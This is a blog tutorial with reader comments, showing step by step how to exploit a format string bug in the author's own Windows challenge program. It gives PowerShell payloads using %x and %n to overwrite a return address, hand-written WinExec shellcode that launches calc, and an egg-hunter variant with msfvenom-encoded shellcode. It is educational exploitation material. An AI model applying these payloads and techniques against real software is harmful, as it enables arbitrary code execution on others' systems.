I thought of making a small challenge on exploiting format strings in Windows. This is how it looks: it asks for a filename to open. At first this might be a bit confusing, since there are no obviously vulnerable functions involved in reading a file. Notice, though, that our first argument to the program is echoed back in the output.
Let’s investigate this inside a debugger. As you can see, if argc == 2 the application continues and argv[1] is passed into the highlighted function.
Inside that function, memset is used to fill the buffer with zeros and strncpy is used to copy the user input into it. But notice that eax, which points to that buffer, is passed directly to printf without any format string. In other words, printf will treat our buffer as its format string. This is quite interesting.
Let’s try to read the stack using the %X format specifier, which prints a value in hexadecimal. As you can see, printf reads straight off the stack: each %X consumes the next 4-byte value as though it were an argument.
I will give 80 A characters followed by a bunch of %x specifiers and look at the output.
In the output you can see 41, which is the hex value of A, and 2558, which is %X.
The %n specifier does not print anything. Instead, it stores the number of characters written so far, up to the point where %n appears, into a variable whose address we must pass as the argument. Basically, this writes to a memory location. For example,
    #include <stdio.h>

    int main() {
        int number;
        printf("Hello %nWorld", &number);
        printf("%d", number);
    }
This will print the value 6, because six characters (“Hello ”) are written before the %n.
So, let’s try placing a %n in the input and see what happens.
The program crashed while trying to write to an address. Let’s see what happened inside the debugger.
This is the place where things go wrong. The value of ECX is moved to the address pointed to by EAX.
Let’s check the registers. EAX contains 78257825 which is “x%x%” and ECX contains f8.
Let’s examine the stack. If we go down the stack, we can see our injected characters. This might give you a nice idea: place the shellcode where the ‘A’ characters are.
At the end of the function epilogue, once it hits RET, EIP is loaded with the return address stored on the stack, which points back into the calling function.
If we check the call stack, we can see the first frame pointer, which is at 0019f72c.
The return address is stored at 0019f730, which holds 00401188, an address in the previous function. Notice that the address 0019f730 starts with a null byte. This won’t be an issue if we place this address at the very end of our payload in little-endian format, because the null byte then comes last.
Here’s the plan. We can control both ECX and EAX in this scenario. We can put the address of the shellcode in ECX and the address of the stack slot holding the return address in EAX. Once the program hits “mov dword ptr [eax],ecx”, the address of the shellcode will be written over the return address on the stack. When the program reaches the end of the function and hits the epilogue (LEAVE, RET), EIP will be loaded with our newly written address, which points to our shellcode.
Alright, the plan sounds cool, so let’s implement it and try it out.
First, we should make EAX point to our return address. My first payload was something like this. As in the previous image, EAX contains 78257825, which is “x%x%”.
    $Buffer = 'A' * 80
    $fmt = '%x' * 21 + '%n'
    $ret = 'B' * 4
    $final = $Buffer + $fmt + $ret

    Start-Process ./fmt.exe -ArgumentList $final
We must keep experimenting until EAX points to our 4 B characters. I kept increasing the number of “%x” specifiers and finally got EAX to contain “BBBB”. So, the next payload I tried was this.
    $Buffer = 'A' * 80
    $fmt = '%x' * 41 + '%n'
    $ret = 'B' * 4
    $final = $Buffer + $fmt + $ret

    Start-Process ./fmt.exe -ArgumentList $final
Next, let’s try to control the ECX register by making it hold the address of our shellcode. As in the previous image, our shellcode is located at 0019f758. Let’s divide this number by 4, since we will spread it across four padded %x specifiers.
0x0019f758/4 = 425430
Let’s give this value to %x as a precision (%.425430x); this will change the value of ECX. At the same time, I am going to increase the number of %x specifiers from 41 to 51 to keep EAX pointing to our Bs, since the longer format string shifts their position on the stack. We must keep experimenting until we reach our goal.
    $Buffer = 'A' * 80
    $fmt = '%x' * 51 + '%.425430x' * 4 +'%n'
    $ret = 'B' * 4
    $final = $Buffer + $fmt + $ret

    Start-Process ./fmt.exe -ArgumentList $final
Now ECX contains 0019f940, but we need it to contain 0019f758.
Let’s find the difference and try again.
0x0019f940 – 0x0019f758 = 488
By adding 488 to our last format string we should get somewhere close to our goal. Let’s try it out.
425430 + 488 = 425918
    $Buffer = 'A' * 80
    $fmt = '%x' * 51 + '%.425430x' * 3 + '%.425918x' +'%n'
    $ret = 'B' * 4
    $final = $Buffer + $fmt + $ret

    Start-Process ./fmt.exe -ArgumentList $final
Now ECX contains 19fb28. Let’s again find the difference.
0x19fb28 – 0x19f758 = 976
Adding moved ECX further away from the target, so this time we subtract. By subtracting the difference from the precision of the last format specifier, we should get ECX holding the exact address we need.
425918 - 976 = 424942
    $Buffer = 'A' * 80
    $fmt = '%x' * 51 + '%.425430x' * 3 + '%.424942x' +'%n'
    $ret = 'B' * 4
    $final = $Buffer + $fmt + $ret

    Start-Process ./fmt.exe -ArgumentList $final
Now ECX contains 19f758, which is the location where we are going to place our shellcode.
Since we have 80 A characters to work with, I will first write my own small shellcode to pop a calc, because increasing the number of A characters again would make recalculating the offsets a pain. I will use the WinExec API to launch calc. Let’s find its address.
This is a simple asm code that I’ve written to call the WinExec API.
    format PE GUI 4.0
    entry ShellCode
    include 'win32ax.inc'

    ; Author: @OsandaMalith

    section '.code' executable readable writeable

    ShellCode:
        push ebp
        mov ebp, esp
        xor edi, edi
        push edi
        mov byte [ebp-04h], 'c'
        mov byte [ebp-03h], 'a'
        mov byte [ebp-02h], 'l'
        mov byte [ebp-01h], 'c'
        mov dword [esp+4], edi
        mov byte [ebp-08h], 01h
        lea eax, [ebp-04h]
        push eax
        mov eax, 75263640h
        call eax
This is our final exploit.
    <#
    # Author: @OsandaMalith
    # Website: https://osandamalith.com
    # Format String Exploitation
    #>

    $shellcode = [Byte[]] @(
        0x55,                         # push ebp
        0x89, 0xE5,                   # mov ebp, esp
        0x31, 0xFF,                   # xor edi, edi
        0x57,                         # push edi
        0xC6, 0x45, 0xFC, 0x63,       # mov byte [ebp-04h], 'c'
        0xC6, 0x45, 0xFD, 0x61,       # mov byte [ebp-03h], 'a'
        0xC6, 0x45, 0xFE, 0x6C,       # mov byte [ebp-02h], 'l'
        0xC6, 0x45, 0xFF, 0x63,       # mov byte [ebp-01h], 'c'
        0x89, 0x7C, 0x24, 0x04,       # mov dword [esp+4], edi
        0xC6, 0x45, 0xF8, 0x01,       # mov byte [ebp-08h], 01h
        0x8D, 0x45, 0xFC,             # lea eax, [ebp-04h]
        0x50,                         # push eax
        0xB8, 0x40, 0x36, 0x26, 0x75, # mov eax, 75263640h
        0xFF, 0xD0                    # call eax
    )

    $shellcode += [Byte[]] (0x41) * (80 - $shellcode.Length)
    $fmt = ([system.Text.Encoding]::ASCII).GetBytes('%x' * 51) +
           ([system.Text.Encoding]::ASCII).GetBytes('%.425430x' * 3) +
           ([system.Text.Encoding]::ASCII).GetBytes('%.424942x') +
           ([system.Text.Encoding]::ASCII).GetBytes('%n')
    $ret = [System.BitConverter]::GetBytes(0x0019f730)

    $final = $shellcode + $fmt + $ret
    $payload = ''

    ForEach ($i in $final) {
        $payload += ([system.Text.Encoding]::Default).GetChars($i)
    }

    Start-Process ./fmt.exe -ArgumentList $payload
Let’s have a final look inside the debugger.
The value of ECX, 0019f758, is about to be written to the address held in EAX, 0019f730, which is the stack slot containing our return address. If we look at the memory ECX points to, we find our shellcode.
As soon as the function hits the return, EIP will point to our shellcode.
Once we run this exploit, w00t! We get our calculator.
How about we use an egg hunter to find our shellcode? One may argue that we could use a long jump, or place the shellcode directly at the beginning. Still, I thought of using this for fun and out of curiosity.
First, I checked for bad characters and found “\x00\x09\x20” to be the bad characters in this program. Here’s the exploit with the egg hunter. Note that the offsets might differ on other Windows versions.
    <#
    # Author: @OsandaMalith
    # Website: https://osandamalith.com
    # Egg hunter for the format string bug
    #>

    [Byte[]] $egg = 0x66,0x81,0xca,0xff,0x0f,0x42,0x52,0x6a,0x02,0x58,0xcd,0x2e,0x3c,0x05,0x5a,0x74,0xef,0xb8,0x54,0x30,0x30,0x57,0x8b,0xfa,0xaf,0x75,0xea,0xaf,0x75,0xe7,0xff,0xe7

    $shellcode = ([system.Text.Encoding]::ASCII).GetBytes('W00TW00T')

    #msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f powershell -e x86/alpha_mixed
    [Byte[]] $shellcode += 0x89,0xe0,0xdd,0xc7,0xd9,0x70,0xf4,0x5a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x4a,0x43,0x43,0x43,0x43,0x43,0x43,0x37,0x52,0x59,0x6a,0x41,0x58,0x50,0x30,0x41,0x30,0x41,0x6b,0x41,0x41,0x51,0x32,0x41,0x42,0x32,0x42,0x42,0x30,0x42,0x42,0x41,0x42,0x58,0x50,0x38,0x41,0x42,0x75,0x4a,0x49,0x49,0x6c,0x78,0x68,0x4c,0x42,0x55,0x50,0x73,0x30,0x33,0x30,0x61,0x70,0x6c,0x49,0x6b,0x55,0x56,0x51,0x4b,0x70,0x73,0x54,0x6c,0x4b,0x56,0x30,0x56,0x50,0x6c,0x4b,0x32,0x72,0x76,0x6c,0x4e,0x6b,0x71,0x42,0x57,0x64,0x4e,0x6b,0x73,0x42,0x34,0x68,0x44,0x4f,0x48,0x37,0x53,0x7a,0x74,0x66,0x34,0x71,0x39,0x6f,0x4c,0x6c,0x45,0x6c,0x43,0x51,0x73,0x4c,0x76,0x62,0x44,0x6c,0x65,0x70,0x6b,0x71,0x38,0x4f,0x64,0x4d,0x37,0x71,0x7a,0x67,0x59,0x72,0x68,0x72,0x43,0x62,0x42,0x77,0x4e,0x6b,0x50,0x52,0x32,0x30,0x4e,0x6b,0x72,0x6a,0x77,0x4c,0x6e,0x6b,0x52,0x6c,0x57,0x61,0x73,0x48,0x78,0x63,0x72,0x68,0x33,0x31,0x38,0x51,0x30,0x51,0x6e,0x6b,0x70,0x59,0x75,0x70,0x55,0x51,0x4e,0x33,0x6c,0x4b,0x73,0x79,0x46,0x78,0x7a,0x43,0x45,0x6a,0x62,0x69,0x4c,0x4b,0x65,0x64,0x6c,0x4b,0x75,0x51,0x38,0x56,0x50,0x31,0x59,0x6f,0x4c,0x6c,0x59,0x51,0x6a,0x6f,0x76,0x6d,0x63,0x31,0x48,0x47,0x44,0x78,0x4d,0x30,0x42,0x55,0x4c,0x36,0x65,0x53,0x31,0x6d,0x58,0x78,0x55,0x6b,0x31,0x6d,0x71,0x34,0x31,0x65,0x6a,0x44,0x61,0x48,0x6e,0x6b,0x32,0x78,0x51,0x34,0x55,0x51,0x6a,0x73,0x71,0x76,0x6c,0x4b,0x44,0x4c,0x70,0x4b,0x4e,0x6b,0x53,0x68,0x57,0x6c,0x73,0x31,0x49,0x43,0x4e,0x6b,0x74,0x44,0x6e,0x6b,0x76,0x61,0x78,0x50,0x4c,0x49,0x30,0x44,0x76,0x44,0x66,0x44,0x73,0x6b,0x43,0x6b,0x61,
        0x71,0x53,0x69,0x32,0x7a,0x72,0x71,0x79,0x6f,0x6d,0x30,0x43,0x6f,0x63,0x6f,0x72,0x7a,0x6e,0x6b,0x74,0x52,0x7a,0x4b,0x4e,0x6d,0x31,0x4d,0x43,0x5a,0x55,0x51,0x6e,0x6d,0x4f,0x75,0x38,0x32,0x75,0x50,0x55,0x50,0x65,0x50,0x30,0x50,0x71,0x78,0x65,0x61,0x6c,0x4b,0x52,0x4f,0x6d,0x57,0x79,0x6f,0x4a,0x75,0x4f,0x4b,0x4a,0x50,0x4d,0x65,0x49,0x32,0x73,0x66,0x71,0x78,0x6f,0x56,0x6d,0x45,0x6f,0x4d,0x6f,0x6d,0x39,0x6f,0x4b,0x65,0x75,0x6c,0x45,0x56,0x51,0x6c,0x64,0x4a,0x4d,0x50,0x4b,0x4b,0x79,0x70,0x31,0x65,0x37,0x75,0x4d,0x6b,0x71,0x57,0x76,0x73,0x62,0x52,0x52,0x4f,0x71,0x7a,0x63,0x30,0x62,0x73,0x49,0x6f,0x69,0x45,0x53,0x53,0x51,0x71,0x50,0x6c,0x33,0x53,0x36,0x4e,0x53,0x55,0x70,0x78,0x32,0x45,0x45,0x50,0x41,0x41

    $egg += [Byte[]] (0x41) * (80 - $egg.Length)
    $fmt = ([system.Text.Encoding]::ASCII).GetBytes('%x' * 305) +
           ([system.Text.Encoding]::ASCII).GetBytes('%.425430x' * 3) +
           ([system.Text.Encoding]::ASCII).GetBytes('%.424942x') +
           ([system.Text.Encoding]::ASCII).GetBytes('%n')
    $ret = [System.BitConverter]::GetBytes(0x0019f730)

    $final = $egg + $fmt + $shellcode + $ret
    $payload = ''

    ForEach ($i in $final) {
        $payload += ([system.Text.Encoding]::Default).GetChars($i)
    }

    Start-Process ./fmt.exe -ArgumentList $payload
This method of exploitation is compiler dependent. I have tested it with the Embarcadero C++ (Borland C++) and Visual C++ 2000 compilers. With other compilers, the printf implementation is not the same as in these. You can research more on other compilers.
what is the debugger’s name that you used?
WinDbg
Thnks
For the graphs, is it IDA?
Yeah IDA
Hey, how did you know that the address of BBBB will always be last? Does printf on Windows act differently than printf on Linux? I mean, usually if you use %n in printf vulnerabilities, the address that you want to write to should be at the beginning, no?
Actually the printf function is compiled in different ways in different compilers under Windows 🙂 I kept on adding “%X” till I reach the end of the payload. I added “BBBB” at the end since the return address has null characters.
thanks, I get it now, btw your tutorials are awesome!
Thank you mate 🙂
How did you use non-printable characters as arguments when running the executable in WinDbg for the last stage of the exploit (when you were debugging the working exploit code) with 0x0019f730, i.e. how did you input this in WinDbg?